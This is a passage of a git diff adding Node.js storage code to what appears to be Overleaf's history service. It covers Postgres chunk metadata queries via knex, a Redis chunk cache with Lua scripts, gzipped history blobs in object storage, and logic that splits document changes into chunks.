whereAfterEndTimestampOrLatestChunk = knex.raw( + 'end_timestamp >= ? ' + + 'OR id = ( ' + + 'SELECT id FROM chunks ' + + 'WHERE doc_id = ? ' + + 'ORDER BY end_version desc LIMIT 1' + + ')', + [timestamp, parseInt(projectId, 10)] + ) + + const record = await knex('chunks') + .where('doc_id', parseInt(projectId, 10)) + .where(whereAfterEndTimestampOrLatestChunk) + .orderBy('end_version') + .first() + if (!record) { + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) + } + return chunkFromRecord(record) +} + +/** + * Build a chunk metadata object from the database record + */ +function chunkFromRecord(record) { + return { + id: record.id.toString(), + startVersion: record.start_version, + endVersion: record.end_version, + endTimestamp: record.end_timestamp, + } +} + +/** + * Get all of a project's chunk ids + * + * @param {string} projectId + */ +async function getProjectChunkIds(projectId) { + assert.postgresId(projectId, 'bad projectId') + + const records = await knex('chunks') + .select('id') + .where('doc_id', parseInt(projectId, 10)) + return records.map(record => record.id) +} + +/** + * Get all of a projects chunks directly + * + * @param {string} projectId + */ +async function getProjectChunks(projectId) { + assert.postgresId(projectId, 'bad projectId') + + const records = await knex('chunks') + .select() + .where('doc_id', parseInt(projectId, 10)) + .orderBy('end_version') + return records.map(chunkFromRecord) +} + +/** + * Insert a pending chunk before sending it to object storage. + * + * @param {string} projectId + * @param {Chunk} chunk + */ +async function insertPendingChunk(projectId, chunk) { + assert.postgresId(projectId, 'bad projectId') + + const result = await knex.first( + knex.raw("nextval('chunks_id_seq'::regclass)::integer as chunkid") + ) + const chunkId = result.chunkid + await knex('pending_chunks').insert({ + id: chunkId, + doc_id: parseInt(projectId, 10), + end_version: chunk.getEndVersion(), + start_version: chunk.getStartVersion(), + end_timestamp: chunk.getEndTimestamp(), + }) + return chunkId.toString() +} + +/** + * Record that a new chunk was created. + * + * @param {string} projectId + * @param {Chunk} chunk + * @param {string} chunkId + * @param {object} opts + * @param {Date} [opts.earliestChangeTimestamp] + * @param {string} [opts.oldChunkId] + */ +async function confirmCreate(projectId, chunk, chunkId, opts = {}) { + assert.postgresId(projectId, 'bad projectId') + + await knex.transaction(async tx => { + if (opts.oldChunkId != null) { + await _assertChunkIsNotClosed(tx, projectId, opts.oldChunkId) + await _closeChunk(tx, projectId, opts.oldChunkId) + } + await Promise.all([ + _deletePendingChunk(tx, projectId, chunkId), + _insertChunk(tx, projectId, chunk, chunkId), + ]) + await updateProjectRecord( + // The history id in Mongo is an integer for Postgres projects + parseInt(projectId, 10), + chunk, + opts.earliestChangeTimestamp + ) + }) +} + +/** + * Record that a chunk was replaced by a new one. + * + * @param {string} projectId + * @param {string} oldChunkId + * @param {Chunk} newChunk + * @param {string} newChunkId + */ +async function confirmUpdate( + projectId, + oldChunkId, + newChunk, + newChunkId, + opts = {} +) { + assert.postgresId(projectId, 'bad projectId') + + await knex.transaction(async tx => { + await _assertChunkIsNotClosed(tx, projectId, oldChunkId) + await _deleteChunks(tx, { doc_id: projectId, id: oldChunkId }) + await Promise.all([ + _deletePendingChunk(tx, projectId, newChunkId), + _insertChunk(tx, projectId, newChunk, newChunkId), + ]) + await updateProjectRecord( + // The history id in Mongo is an integer for Postgres projects + parseInt(projectId, 10), + newChunk, + opts.earliestChangeTimestamp + ) + }) +} + +/** + * Delete a pending chunk + * + * @param {Knex} tx + * @param {string} projectId + * @param {string} chunkId + */ +async function _deletePendingChunk(tx, projectId, chunkId) { + await tx('pending_chunks') + .where({ + doc_id: parseInt(projectId, 10), + id: parseInt(chunkId, 10), + }) + .del() +} + +/** + * Adds an active chunk + * + * @param {Knex} tx + * @param {string} projectId + * @param {Chunk} chunk + * @param {string} chunkId + */ +async function _insertChunk(tx, projectId, chunk, chunkId) { + const startVersion = chunk.getStartVersion() + const endVersion = chunk.getEndVersion() + try { + await tx('chunks').insert({ + id: parseInt(chunkId, 10), + doc_id: parseInt(projectId, 10), + start_version: startVersion, + end_version: endVersion, + end_timestamp: chunk.getEndTimestamp(), + }) + } catch (err) { + if ( + err instanceof Error && + 'code' in err && + err.code === DUPLICATE_KEY_ERROR_CODE + ) { + throw new ChunkVersionConflictError( + 'chunk start or end version is not unique', + { projectId, chunkId, startVersion, endVersion } + ) + } + throw err + } +} + +/** + * Check that a chunk is not closed + * + * This is used to synchronize chunk creations and extensions. + * + * @param {Knex} tx + * @param {string} projectId + * @param {string} chunkId + */ +async function _assertChunkIsNotClosed(tx, projectId, chunkId) { + const record = await tx('chunks') + .forUpdate() + .select('closed') + .where('doc_id', parseInt(projectId, 10)) + .where('id', parseInt(chunkId, 10)) + .first() + if (!record) { + throw new ChunkVersionConflictError('unable to close chunk: not found', { + projectId, + chunkId, + }) + } + if (record.closed) { + throw new ChunkVersionConflictError( + 'unable to close chunk: already closed', + { + projectId, + chunkId, + } + ) + } +} + +/** + * Close a chunk + * + * A closed chunk can no longer be extended. + * + * @param {Knex} tx + * @param {string} projectId + * @param {string} chunkId + */ +async function _closeChunk(tx, projectId, chunkId) { + await tx('chunks') + .update({ closed: true }) + .where('doc_id', parseInt(projectId, 10)) + .where('id', parseInt(chunkId, 10)) +} + +/** + * Delete a chunk. + * + * @param {string} projectId + * @param {string} chunkId + */ +async function deleteChunk(projectId, chunkId) { + assert.postgresId(projectId, 'bad projectId') + assert.integer(chunkId, 'bad chunkId') + + await _deleteChunks(knex, { + doc_id: parseInt(projectId, 10), + id: parseInt(chunkId, 10), + }) +} + +/** + * Delete all of a project's chunks + * + * @param {string} projectId + */ +async function deleteProjectChunks(projectId) { + assert.postgresId(projectId, 'bad projectId') + + await knex.transaction(async tx => { + await _deleteChunks(knex, { doc_id: parseInt(projectId, 10) }) + }) +} + +/** + * Delete many chunks + * + * @param {Knex} tx + * @param {any} whereClause + */ +async function _deleteChunks(tx, whereClause) { + const rows = await tx('chunks').where(whereClause).del().returning('*') + if (rows.length === 0) { + return + } + + const oldChunks = rows.map(row => ({ + doc_id: row.doc_id, + chunk_id: row.id, + start_version: row.start_version, + end_version: row.end_version, + end_timestamp: row.end_timestamp, + deleted_at: tx.fn.now(), + })) + await tx('old_chunks').insert(oldChunks) +} + +/** + * Get a batch of old chunks for deletion + * + * @param {number} count + * @param {number} minAgeSecs + */ +async function getOldChunksBatch(count, minAgeSecs) { + const maxDeletedAt = new Date(Date.now() - minAgeSecs * 1000) + const records = await knex('old_chunks') + .whereNull('deleted_at') + .orWhere('deleted_at', '<', maxDeletedAt) + .orderBy('chunk_id') + .limit(count) + return records.map(oldChunk => ({ + projectId: oldChunk.doc_id.toString(), + chunkId: oldChunk.chunk_id.toString(), + })) +} + +/** + * Delete a batch of old chunks from the database + * + * @param {string[]} chunkIds + */ +async function deleteOldChunks(chunkIds) { + await knex('old_chunks') + .whereIn( + 'chunk_id', + chunkIds.map(id => parseInt(id, 10)) + ) + .del() +} + +/** + * Generate a new project id + */ +async function generateProjectId() { + const record = await knex.first( + knex.raw("nextval('docs_id_seq'::regclass)::integer as doc_id") + ) + return record.doc_id.toString() +} + +module.exports = { + getLatestChunk, + getFirstChunkBeforeTimestamp, + getLastActiveChunkBeforeTimestamp, + getChunkForVersion, + getChunkForTimestamp, + getProjectChunkIds, + getProjectChunks, + insertPendingChunk, + confirmCreate, + confirmUpdate, + deleteChunk, + deleteProjectChunks, + getOldChunksBatch, + deleteOldChunks, + generateProjectId, +} diff --git a/services/history-v1/storage/lib/chunk_store/redis.js b/services/history-v1/storage/lib/chunk_store/redis.js new file mode 100644 index 0000000..55f36ff --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/redis.js @@ -0,0 +1,254 @@ +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const redis = require('../redis') +const rclient = redis.rclientHistory // +const { Snapshot, Change, History, Chunk } = require('overleaf-editor-core') + +const TEMPORARY_CACHE_LIFETIME = 300 // 5 minutes + +const keySchema = { + snapshot({ projectId }) { + return `snapshot:{${projectId}}` + }, + startVersion({ projectId }) { + return `snapshot-version:{${projectId}}` + }, + changes({ projectId }) { + return `changes:{${projectId}}` + }, +} + +rclient.defineCommand('get_current_chunk', { + numberOfKeys: 3, + lua: ` + local startVersionValue = redis.call('GET', KEYS[2]) + if not startVersionValue then + return nil -- this is a cache-miss + end + local snapshotValue = redis.call('GET', KEYS[1]) + local changesValues = redis.call('LRANGE', KEYS[3], 0, -1) + return {snapshotValue, startVersionValue, changesValues} + `, +}) + +/** + * Retrieves the current chunk of project history from Redis storage + * @param {string} projectId - The unique identifier of the project + * @returns {Promise<Chunk|null>} A Promise that resolves to a Chunk object containing project history, + * or null if retrieval fails + * @throws {Error} If Redis operations fail + */ +async function getCurrentChunk(projectId) { + try { + const result = await rclient.get_current_chunk( + keySchema.snapshot({ projectId }), + keySchema.startVersion({ projectId }), + keySchema.changes({ projectId }) + ) + if (!result) { + return null // cache-miss + } + const snapshot = Snapshot.fromRaw(JSON.parse(result[0])) + const startVersion = JSON.parse(result[1]) + const changes = result[2].map(c => Change.fromRaw(JSON.parse(c))) + const history = new History(snapshot, changes) + const chunk = new Chunk(history, startVersion) + metrics.inc('chunk_store.redis.get_current_chunk', 1, { status: 'success' }) + return chunk + } catch (err) { + logger.error({ err, projectId }, 'error getting current chunk from redis') + metrics.inc('chunk_store.redis.get_current_chunk', 1, { status: 'error' }) + return null + } +} + +rclient.defineCommand('get_current_chunk_metadata', { + numberOfKeys: 2, + lua: ` + local startVersionValue = redis.call('GET', KEYS[1]) + local changesCount = redis.call('LLEN', KEYS[2]) + return {startVersionValue, changesCount} + `, +}) + +/** + * Retrieves the current chunk metadata for a given project from Redis + * @param {string} projectId - The ID of the project to get metadata for + * @returns {Promise<Object|null>} Object containing startVersion and changesCount if found, null on error or cache miss + * @property {number} startVersion - The starting version information + * @property {number} changesCount - The number of changes in the chunk + */ +async function getCurrentChunkMetadata(projectId) { + try { + const result = await rclient.get_current_chunk_metadata( + keySchema.startVersion({ projectId }), + keySchema.changes({ projectId }) + ) + if (!result) { + return null // cache-miss + } + const startVersion = JSON.parse(result[0]) + const changesCount = parseInt(result[1], 10) + return { startVersion, changesCount } + } catch (err) { + return null + } +} + +rclient.defineCommand('set_current_chunk', { + numberOfKeys: 3, + lua: ` + local snapshotValue = ARGV[1] + local startVersionValue = ARGV[2] + redis.call('SETEX', KEYS[1], ${TEMPORARY_CACHE_LIFETIME}, snapshotValue) + redis.call('SETEX', KEYS[2], ${TEMPORARY_CACHE_LIFETIME}, startVersionValue) + redis.call('DEL', KEYS[3]) -- clear the old changes list + if #ARGV >= 3 then + redis.call('RPUSH', KEYS[3], unpack(ARGV, 3)) + redis.call('EXPIRE', KEYS[3], ${TEMPORARY_CACHE_LIFETIME}) + end + `, +}) + +/** + * Stores the current chunk of project history in Redis + * @param {string} projectId - The ID of the project + * @param {Chunk} chunk - The chunk object containing history data + * @returns {Promise<*>} Returns the result of the Redis operation, or null if an error occurs + * @throws {Error} May throw Redis-related errors which are caught internally + */ +async function setCurrentChunk(projectId, chunk) { + try { + const snapshotKey = keySchema.snapshot({ projectId }) + const startVersionKey = keySchema.startVersion({ projectId }) + const changesKey = keySchema.changes({ projectId }) + + const snapshot = chunk.history.snapshot + const startVersion = chunk.startVersion + const changes = chunk.history.changes + + await rclient.set_current_chunk( + snapshotKey, + startVersionKey, + changesKey, + JSON.stringify(snapshot.toRaw()), + startVersion, + ...changes.map(c => JSON.stringify(c.toRaw())) + ) + metrics.inc('chunk_store.redis.set_current_chunk', 1, { status: 'success' }) + } catch (err) { + logger.error( + { err, projectId, chunk }, + 'error setting current chunk inredis' + ) + metrics.inc('chunk_store.redis.set_current_chunk', 1, { status: 'error' }) + return null // while testing we will suppress any errors + } +} + +/** + * Checks whether a cached chunk's version metadata matches the current chunk's metadata + * @param {Chunk} cachedChunk - The chunk retrieved from cache + * @param {Chunk} currentChunk - The current chunk to compare against + * @returns {boolean} - Returns true if the chunks have matching start and end versions, false otherwise + */ +function checkCacheValidity(cachedChunk, currentChunk) { + return Boolean( + cachedChunk && + cachedChunk.getStartVersion() === currentChunk.getStartVersion() && + cachedChunk.getEndVersion() === currentChunk.getEndVersion() + ) +} + +/** + * Validates if a cached chunk matches the current chunk metadata by comparing versions + * @param {Object} cachedChunk - The cached chunk object to validate + * @param {Object} currentChunkMetadata - The current chunk metadata to compare against + * @param {number} currentChunkMetadata.startVersion - The starting version number + * @param {number} currentChunkMetadata.endVersion - The ending version number + * @returns {boolean} - True if the cached chunk is valid, false otherwise + */ +function checkCacheValidityWithMetadata(cachedChunk, currentChunkMetadata) { + return Boolean( + cachedChunk && + cachedChunk.getStartVersion() === currentChunkMetadata.startVersion && + cachedChunk.getEndVersion() === currentChunkMetadata.endVersion + ) +} + +/** + * Compares two chunks for equality using stringified JSON comparison + * @param {string} projectId - The ID of the project + * @param {Chunk} cachedChunk - The cached chunk to compare + * @param {Chunk} currentChunk - The current chunk to compare against + * @returns {boolean} - Returns false if either chunk is null/undefined, otherwise returns the comparison result + */ +function compareChunks(projectId, cachedChunk, currentChunk) { + if (!cachedChunk || !currentChunk) { + return false + } + const identical = JSON.stringify(cachedChunk) === JSON.stringify(currentChunk) + if (!identical) { + try { + logger.error( + { + projectId, + cachedChunkStartVersion: cachedChunk.getStartVersion(), + cachedChunkEndVersion: cachedChunk.getEndVersion(), + currentChunkStartVersion: currentChunk.getStartVersion(), + currentChunkEndVersion: currentChunk.getEndVersion(), + }, + 'chunk cache mismatch' + ) + } catch (err) { + // ignore errors while logging + } + } + metrics.inc('chunk_store.redis.compare_chunks', 1, { + status: identical ? 'success' : 'fail', + }) + return identical +} + +// Define Lua script for atomic cache clearing +rclient.defineCommand('clear_chunk_cache', { + numberOfKeys: 3, + lua: ` + -- Delete all keys related to a project's chunk cache atomically + redis.call('DEL', KEYS[1]) -- snapshot key + redis.call('DEL', KEYS[2]) -- startVersion key + redis.call('DEL', KEYS[3]) -- changes key + return 1 + `, +}) + +/** + * Clears all cache entries for a project's chunk data + * @param {string} projectId - The ID of the project whose cache should be cleared + * @returns {Promise<boolean>} A promise that resolves to true if successful, false on error + */ +async function clearCache(projectId) { + try { + const snapshotKey = keySchema.snapshot({ projectId }) + const startVersionKey = keySchema.startVersion({ projectId }) + const changesKey = keySchema.changes({ projectId }) + + await rclient.clear_chunk_cache(snapshotKey, startVersionKey, changesKey) + metrics.inc('chunk_store.redis.clear_cache', 1, { status: 'success' }) + return true + } catch (err) { + logger.error({ err, projectId }, 'error clearing chunk cache from redis') + metrics.inc('chunk_store.redis.clear_cache', 1, { status: 'error' }) + return false + } +} + +module.exports = { + getCurrentChunk, + setCurrentChunk, + getCurrentChunkMetadata, + checkCacheValidity, + checkCacheValidityWithMetadata, + compareChunks, + clearCache, +} diff --git a/services/history-v1/storage/lib/content_hash.js b/services/history-v1/storage/lib/content_hash.js new file mode 100644 index 0000000..a381bab --- /dev/null +++ b/services/history-v1/storage/lib/content_hash.js @@ -0,0 +1,18 @@ +// @ts-check + +const { createHash } = require('node:crypto') + +/** + * Compute a SHA-1 hash of the content + * + * This is used to validate incoming updates. + * + * @param {string} content + */ +function getContentHash(content) { + const hash = createHash('sha-1') + hash.update(content) + return hash.digest('hex') +} + +module.exports = { getContentHash } diff --git a/services/history-v1/storage/lib/errors.js b/services/history-v1/storage/lib/errors.js new file mode 100644 index 0000000..626536b --- /dev/null +++ b/services/history-v1/storage/lib/errors.js @@ -0,0 +1,5 @@ +const OError = require('@overleaf/o-error') + +class InvalidChangeError extends OError {} + +module.exports = { InvalidChangeError } diff --git a/services/history-v1/storage/lib/hash_check_blob_store.js b/services/history-v1/storage/lib/hash_check_blob_store.js new file mode 100644 index 0000000..5f233d5 --- /dev/null +++ b/services/history-v1/storage/lib/hash_check_blob_store.js @@ -0,0 +1,30 @@ +const Blob = require('overleaf-editor-core').Blob +const blobHash = require('./blob_hash') +const BPromise = require('bluebird') + +// We want to simulate applying all of the operations so we can return the +// resulting hashes to the caller for them to check. To do this, we need to be +// able to take the lazy files in the final snapshot, fetch their content, and +// compute the new content hashes. We don't, however, need to actually store +// that content; we just need to get the hash. +function HashCheckBlobStore(realBlobStore) { + this.realBlobStore = realBlobStore +} + +HashCheckBlobStore.prototype.getString = BPromise.method( + function hashCheckBlobStoreGetString(hash) { + return this.realBlobStore.getString(hash) + } +) + +HashCheckBlobStore.prototype.putString = BPromise.method( + function hashCheckBlobStorePutString(string) { + return new Blob( + blobHash.fromString(string), + Buffer.byteLength(string), + string.length + ) + } +) + +module.exports = HashCheckBlobStore diff --git a/services/history-v1/storage/lib/history_store.js b/services/history-v1/storage/lib/history_store.js new file mode 100644 index 0000000..e51bdc2 --- /dev/null +++ b/services/history-v1/storage/lib/history_store.js @@ -0,0 +1,202 @@ +// @ts-check +'use strict' + +const core = require('overleaf-editor-core') + +const config = require('config') +const path = require('node:path') +const Stream = require('node:stream') +const { promisify } = require('node:util') +const zlib = require('node:zlib') + +const OError = require('@overleaf/o-error') +const objectPersistor = require('@overleaf/object-persistor') +const logger = require('@overleaf/logger') + +const assert = require('./assert') +const persistor = require('./persistor') +const projectKey = require('./project_key') +const streams = require('./streams') + +const Chunk = core.Chunk + +const gzip = promisify(zlib.gzip) +const gunzip = promisify(zlib.gunzip) + +class LoadError extends OError { + /** + * @param {string} projectId + * @param {string} chunkId + * @param {any} cause + */ + constructor(projectId, chunkId, cause) { + super( + 'HistoryStore: failed to load chunk history', + { projectId, chunkId }, + cause + ) + this.projectId = projectId + this.chunkId = chunkId + } +} + +class StoreError extends OError { + /** + * @param {string} projectId + * @param {string} chunkId + * @param {any} cause + */ + constructor(projectId, chunkId, cause) { + super( + 'HistoryStore: failed to store chunk history', + { projectId, chunkId }, + cause + ) + this.projectId = projectId + this.chunkId = chunkId + } +} + +/** + * @param {string} projectId + * @param {string} chunkId + * @return {string} + */ +function getKey(projectId, chunkId) { + return path.join(projectKey.format(projectId), projectKey.pad(chunkId)) +} + +/** + * Store and retreive raw {@link History} objects from bucket. Mainly used via the + * {@link ChunkStore}. + * + * Histories are stored as gzipped JSON blobs, keyed on the project ID and the + * ID of the Chunk that owns the history. The project ID is currently redundant, + * but I think it might help in future if we have to shard on project ID, and + * it gives us some chance of reconstructing histories even if there is a + * problem with the chunk metadata in the database. + * + * @class + */ +class HistoryStore { + #persistor + #bucket + constructor(persistor, bucket) { + this.#persistor = persistor + this.#bucket = bucket + } + + /** + * Load the raw object for a History. + * + * @param {string} projectId + * @param {string} chunkId + * @return {Promise<import('overleaf-editor-core/lib/types').RawHistory>} + */ + async loadRaw(projectId, chunkId) { + assert.projectId(projectId, 'bad projectId') + assert.chunkId(chunkId, 'bad chunkId') + + const key = getKey(projectId, chunkId) + + logger.debug({ projectId, chunkId }, 'loadRaw started') + try { + const buf = await streams.gunzipStreamToBuffer( + await this.#persistor.getObjectStream(this.#bucket, key) + ) + return JSON.parse(buf.toString('utf-8')) + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Chunk.NotPersistedError(projectId) + } + throw new LoadError(projectId, chunkId, err) + } finally { + logger.debug({ projectId, chunkId }, 'loadRaw finished') + } + } + + async loadRawWithBuffer(projectId, chunkId) { + assert.projectId(projectId, 'bad projectId') + assert.chunkId(chunkId, 'bad chunkId') + + const key = getKey(projectId, chunkId) + + logger.debug({ projectId, chunkId }, 'loadBuffer started') + try { + const buf = await streams.readStreamToBuffer( + await this.#persistor.getObjectStream(this.#bucket, key) + ) + const unzipped = await gunzip(buf) + return { + buffer: buf, + raw: JSON.parse(unzipped.toString('utf-8')), + } + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Chunk.NotPersistedError(projectId) + } + throw new LoadError(projectId, chunkId, err) + } finally { + logger.debug({ projectId, chunkId }, 'loadBuffer finished') + } + } + + /** + * Compress and store a {@link History}. + * + * @param {string} projectId + * @param {string} chunkId + * @param {import('overleaf-editor-core/lib/types').RawHistory} rawHistory + */ + async storeRaw(projectId, chunkId, rawHistory) { + assert.projectId(projectId, 'bad projectId') + assert.chunkId(chunkId, 'bad chunkId') + assert.object(rawHistory, 'bad rawHistory') + + const key = getKey(projectId, chunkId) + + logger.debug({ projectId, chunkId }, 'storeRaw started') + + const buf = await gzip(JSON.stringify(rawHistory)) + try { + await this.#persistor.sendStream( + this.#bucket, + key, + Stream.Readable.from([buf]), + { + contentType: 'application/json', + contentEncoding: 'gzip', + contentLength: buf.byteLength, + } + ) + } catch (err) { + throw new StoreError(projectId, chunkId, err) + } finally { + logger.debug({ projectId, chunkId }, 'storeRaw finished') + } + } + + /** + * Delete multiple chunks from bucket. Expects an Array of objects with + * projectId and chunkId properties + * @param {Array<{projectId: string,chunkId:string}>} chunks + */ + async deleteChunks(chunks) { + logger.debug({ chunks }, 'deleteChunks started') + try { + await Promise.all( + chunks.map(chunk => { + const key = getKey(chunk.projectId, chunk.chunkId) + return this.#persistor.deleteObject(this.#bucket, key) + }) + ) + } finally { + logger.debug({ chunks }, 'deleteChunks finished') + } + } +} + +module.exports = { + HistoryStore, + historyStore: new HistoryStore(persistor, config.get('chunkStore.bucket')), +} diff --git a/services/history-v1/storage/lib/knex.js b/services/history-v1/storage/lib/knex.js new file mode 100644 index 0000000..7000fe0 --- /dev/null +++ b/services/history-v1/storage/lib/knex.js @@ -0,0 +1,8 @@ +// @ts-check + +'use strict' + +const env = process.env.NODE_ENV || 'development' + +const knexfile = require('../../knexfile') +module.exports = require('knex').default(knexfile[env]) diff --git a/services/history-v1/storage/lib/knex_read_only.js b/services/history-v1/storage/lib/knex_read_only.js new file mode 100644 index 0000000..a78c468 --- /dev/null +++ b/services/history-v1/storage/lib/knex_read_only.js @@ -0,0 +1,19 @@ +'use strict' + +const config = require('config') +const knexfile = require('../../knexfile') + +const env = process.env.NODE_ENV || 'development' + +if (config.databaseUrlReadOnly) { + module.exports = require('knex')({ + ...knexfile[env], + pool: { + ...knexfile[env].pool, + min: 0, + }, + connection: config.databaseUrlReadOnly, + }) +} else { + module.exports = require('./knex') +} diff --git a/services/history-v1/storage/lib/mongodb.js b/services/history-v1/storage/lib/mongodb.js new file mode 100644 index 0000000..e887bc2 --- /dev/null +++ b/services/history-v1/storage/lib/mongodb.js @@ -0,0 +1,30 @@ +const Metrics = require('@overleaf/metrics') + +const config = require('config') +const { MongoClient } = require('mongodb') + +const client = new MongoClient(config.mongo.uri) +const db = client.db() + +const chunks = db.collection('projectHistoryChunks') +const blobs = db.collection('projectHistoryBlobs') +const globalBlobs = db.collection('projectHistoryGlobalBlobs') +const shardedBlobs = db.collection('projectHistoryShardedBlobs') +const projects = db.collection('projects') +// Temporary collection for tracking progress of backed up old blobs (without a hash). +// The initial sync process will be able to skip over these. +// Schema: _id: projectId, blobs: [Binary] +const backedUpBlobs = db.collection('projectHistoryBackedUpBlobs') + +Metrics.mongodb.monitor(client) + +module.exports = { + client, + db, + chunks, + blobs, + globalBlobs, + projects, + shardedBlobs, + backedUpBlobs, +} diff --git a/services/history-v1/storage/lib/persist_changes.js b/services/history-v1/storage/lib/persist_changes.js new file mode 100644 index 0000000..8a848aa --- /dev/null +++ b/services/history-v1/storage/lib/persist_changes.js @@ -0,0 +1,261 @@ +// @ts-check + +'use strict' + +const _ = require('lodash') +const logger = require('@overleaf/logger') + +const core = require('overleaf-editor-core') +const Chunk = core.Chunk +const History = core.History + +const assert = require('./assert') +const chunkStore = require('./chunk_store') +const { BlobStore } = require('./blob_store') +const { InvalidChangeError } = require('./errors') +const { getContentHash } = require('./content_hash') + +function countChangeBytes(change) { + // Note: This is not quite accurate, because the raw change may contain raw + // file info (or conceivably even content) that will not be included in the + // actual stored object. + return Buffer.byteLength(JSON.stringify(change.toRaw())) +} + +function totalChangeBytes(changes) { + return changes.length ? _(changes).map(countChangeBytes).sum() : 0 +} + +// provide a simple timer function +function Timer() { + this.t0 = process.hrtime() +} +Timer.prototype.elapsed = function () { + const dt = process.hrtime(this.t0) + const timeInMilliseconds = (dt[0] + dt[1] * 1e-9) * 1e3 + return timeInMilliseconds +} + +/** + * Break the given set of changes into zero or more Chunks according to the + * provided limits and store them. + * + * Some other possible improvements: + * 1. This does a lot more JSON serialization than it has to. We may know the + * JSON for the changes before we call this function, so we could in that + * case get the byte size of each change without doing any work. Even if we + * don't know it initially, we could save some computation by caching this + * info rather than recomputing it many times. TBD whether it is worthwhile. + * 2. We don't necessarily have to fetch the latest chunk in order to determine + * that it is full. We could store this in the chunk metadata record. It may + * be worth distinguishing between a Chunk and its metadata record. The + * endVersion may be better suited to the metadata record. + * + * @param {string} projectId + * @param {core.Change[]} allChanges + * @param {Object} limits + * @param {number} clientEndVersion + * @return {Promise.<Object?>} + */ +async function persistChanges(projectId, allChanges, limits, clientEndVersion) { + assert.projectId(projectId) + assert.array(allChanges) + assert.maybe.object(limits) + assert.integer(clientEndVersion) + + const blobStore = new BlobStore(projectId) + + const earliestChangeTimestamp = + allChanges.length > 0 ? allChanges[0].getTimestamp() : null + + let currentChunk + + /** + * currentSnapshot tracks the latest change that we're applying; we use it to + * check that the changes we are persisting are valid. + * + * @type {core.Snapshot} + */ + let currentSnapshot + + let originalEndVersion + let changesToPersist + + limits = limits || {} + _.defaults(limits, { + changeBucketMinutes: 60, + maxChanges: 2500, + maxChangeBytes: 5 * 1024 * 1024, + maxChunkChanges: 2000, + maxChunkChangeBytes: 5 * 1024 * 1024, + maxChunkChangeTime: 5000, // warn if total time for changes in a chunk takes longer than this + }) + + function checkElapsedTime(timer) { + const timeTaken = timer.elapsed() + if (timeTaken > limits.maxChunkChangeTime) { + console.log('warning: slow chunk', projectId, timeTaken) + } + } + + /** + * Add changes to a chunk until the chunk is full + * + * The chunk is full if it reaches a certain number of changes or a certain + * size in bytes + * + * @param {core.Chunk} chunk + * @param {core.Change[]} changes + */ + async function fillChunk(chunk, changes) { + let totalBytes = totalChangeBytes(chunk.getChanges()) + let changesPushed = false + while (changes.length > 0) { + if (chunk.getChanges().length >= limits.maxChunkChanges) { + break + } + + const change = changes[0] + const changeBytes = countChangeBytes(change) + + if (totalBytes + changeBytes > limits.maxChunkChangeBytes) { + break + } + + for (const operation of change.iterativelyApplyTo(currentSnapshot, { + strict: true, + })) { + await validateContentHash(operation) + } + + chunk.pushChanges([change]) + changes.shift() + totalBytes += changeBytes + changesPushed = true + } + return changesPushed + } + + /** + * Check that the operation is valid and can be incorporated to the history. + * + * For now, this checks content hashes when they are provided. + * + * @param {core.Operation} operation + */ + async function validateContentHash(operation) { + if (operation instanceof core.EditFileOperation) { + const editOperation = operation.getOperation() + if ( + editOperation instanceof core.TextOperation && + editOperation.contentHash != null + ) { + const path = operation.getPathname() + const file = currentSnapshot.getFile(path) + if (file == null) { + throw new InvalidChangeError('file not found for hash validation', { + projectId, + path, + }) + } + await file.load('eager', blobStore) + const content = file.getContent({ filterTrackedDeletes: true }) + const expectedHash = editOperation.contentHash + const actualHash = content != null ? getContentHash(content) : null + logger.debug({ expectedHash, actualHash }, 'validating content hash') + if (actualHash !== expectedHash) { + throw new InvalidChangeError('content hash mismatch', { + projectId, + path, + expectedHash, + actualHash, + }) + } + + // Remove the content hash from the change before storing it in the chunk. + // It was only useful for validation. + editOperation.contentHash = null + } + } + } + + async function extendLastChunkIfPossible() { + const latestChunk = await chunkStore.loadLatest(projectId) + + currentChunk = latestChunk + originalEndVersion = latestChunk.getEndVersion() + if (originalEndVersion !== clientEndVersion) { + throw new Chunk.ConflictingEndVersion( + clientEndVersion, + originalEndVersion + ) + } + + currentSnapshot = latestChunk.getSnapshot().clone() + const timer = new Timer() + currentSnapshot.applyAll(latestChunk.getChanges()) + + const changesPushed = await fillChunk(currentChunk, changesToPersist) + if (!changesPushed) { + return + } + + checkElapsedTime(timer) + + await chunkStore.update( + projectId, + originalEndVersion, + currentChunk, + earliestChangeTimestamp + ) + } + + async function createNewChunksAsNeeded() { + while (changesToPersist.length > 0) { + const endVersion = currentChunk.getEndVersion() + const history = new History(currentSnapshot.clone(), []) + const chunk = new Chunk(history, endVersion) + const timer = new Timer() + + const changesPushed = await fillChunk(chunk, changesToPersist) + if (changesPushed) { + checkElapsedTime(timer) + currentChunk = chunk + await chunkStore.create(projectId, chunk, earliestChangeTimestamp) + } else { + throw new Error('failed to fill empty chunk') + } + } + } + + function isOlderThanMinChangeTimestamp(change) { + return change.getTimestamp().getTime() < limits.minChangeTimestamp + } + + function isOlderThanMaxChangeTimestamp(change) { + return change.getTimestamp().getTime() < limits.maxChangeTimestamp + } + + const oldChanges = _.filter(allChanges, isOlderThanMinChangeTimestamp) + const anyTooOld = _.some(oldChanges, isOlderThanMaxChangeTimestamp) + const tooManyChanges = oldChanges.length > limits.maxChanges + const tooManyBytes = totalChangeBytes(oldChanges) > limits.maxChangeBytes + + if (anyTooOld || tooManyChanges || tooManyBytes) { + changesToPersist = oldChanges + const numberOfChangesToPersist = oldChanges.length + + await extendLastChunkIfPossible() + await createNewChunksAsNeeded() + + return { + numberOfChangesPersisted: numberOfChangesToPersist, + originalEndVersion, + currentChunk, + } + } else { + return null + } +} + +module.exports = persistChanges diff --git a/services/history-v1/storage/lib/persistor.js b/services/history-v1/storage/lib/persistor.js new file mode 100644 index 0000000..5b3400d --- /dev/null +++ b/services/history-v1/storage/lib/persistor.js @@ -0,0 +1,27 @@ +const _ = require('lodash') +const config = require('config') +const metrics = require('@overleaf/metrics') +const objectPersistor = require('@overleaf/object-persistor') + +const persistorConfig = _.cloneDeep(config.get('persistor')) + +function convertKey(key, convertFn) { + if (_.has(persistorConfig, key)) { + _.update(persistorConfig, key, convertFn) + } +} + +convertKey('s3.signedUrlExpiryInMs', s => parseInt(s, 10)) +convertKey('s3.httpOptions.timeout', s => parseInt(s, 10)) +convertKey('s3.maxRetries', s => parseInt(s, 10)) +convertKey('s3.pathStyle', s => s === 'true') 